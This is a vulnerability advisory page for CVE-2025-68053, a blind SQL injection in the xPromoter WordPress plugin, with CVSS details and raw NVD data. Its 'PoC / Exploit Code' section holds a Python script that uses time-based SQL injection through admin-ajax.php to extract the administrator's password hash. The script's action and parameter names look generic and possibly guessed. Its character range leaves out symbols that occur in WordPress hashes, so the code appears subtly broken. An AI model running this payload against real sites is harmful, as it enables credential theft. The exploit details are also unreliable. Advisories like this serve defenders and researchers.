Security Vulnerability Report
中文
CVE-2025-68053 CVSS 8.5 HIGH

CVE-2025-68053

Published: 2025-12-16 09:16:01
Last Modified: 2026-04-27 19:16:23

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup xPromoter top_bar_promoter allows Blind SQL Injection.This issue affects xPromoter: from n/a through <= 1.3.4.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

xPromoter top_bar_promoter <= 1.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time target_url = "http://target-site.com/wp-admin/admin-ajax.php" # Blind SQL Injection PoC for CVE-2025-68053 # Extract admin password hash using time-based blind injection def extract_char(position, char_value): # Construct SQL injection payload payload = { 'action': 'xpromoter_action', 'param': f"1' AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),{position},1))={char_value}) THEN SLEEP(5) ELSE 0 END)-- -", } start_time = time.time() response = requests.post(target_url, data=payload, timeout=10) elapsed = time.time() - start_time return elapsed > 5 # Example: Extract first character of admin password hash admin_password_hash = "" for pos in range(1, 35): for ascii_val in range(48, 123): if extract_char(pos, ascii_val): admin_password_hash += chr(ascii_val) print(f"Character {pos}: {chr(ascii_val)}") break print(f"Admin password hash: {admin_password_hash}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68053", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:00.930", "lastModified": "2026-04-27T19:16:23.433", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup xPromoter top_bar_promoter allows Blind SQL Injection.This issue affects xPromoter: from n/a through <= 1.3.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/top_bar_promoter/vulnerability/wordpress-xpromoter-plugin-1-3-4-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}